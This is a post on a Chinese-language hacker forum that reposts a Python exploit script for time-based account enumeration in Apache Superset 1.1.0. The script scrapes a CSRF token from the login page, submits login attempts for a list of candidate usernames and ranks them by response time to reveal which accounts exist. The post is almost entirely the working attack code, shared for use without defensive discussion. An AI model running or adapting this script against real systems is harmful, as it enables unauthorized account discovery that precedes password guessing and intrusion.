跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Apache Superset 1.1.0 - Time-Based Account Enumeration


HACK1949

推荐的帖子

# Exploit Title: Apache Superset 1.1.0 - Time-Based Account Enumeration
# Author: Dolev Farhi
# Date: 2021-05-13
# Vendor Homepage: https://superset.apache.org/
# Version: 1.1.0
# Tested on: Ubuntu

import sys
import requests
import time

scheme = 'http'
host = '192.168.1.1'
port = 8080

# change with your wordlist
usernames = ['guest', 'admin', 'administrator', 'idontexist', 'superset']

url = '{}://{}:{}'.format(scheme, host, port)
login_endpoint = '/login/'

session = requests.Session()

def get_csrf():
  token = None
  r = session.get(url + login_endpoint, verify=False)

  for line in r.text.splitlines():
    if 'csrf_token' in line:
      try:
        token = line.strip().split('"')[-2]
      except:
        pass
  return token

csrf_token = get_csrf()

if not csrf_token:
  print('Could not obtain CSRF token, the exploit will likely fail.')
  sys.exit(1)

data = {
  'csrf_token':csrf_token,
  'username':'',
  'password':'abc'
}

attempts = {}
found = False

for user in usernames:
  start = time.time()
  data['username'] = user
  r = session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True)
  roundtrip = time.time() - start
  attempts["%.4f" % roundtrip] = user

print('[!] Accounts existence probability is sorted from high to low')

count = 0

for key in sorted(attempts, reverse=True):
  count += 1
  print("%s. %s (timing: %s)" % (count, attempts[key], key))
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...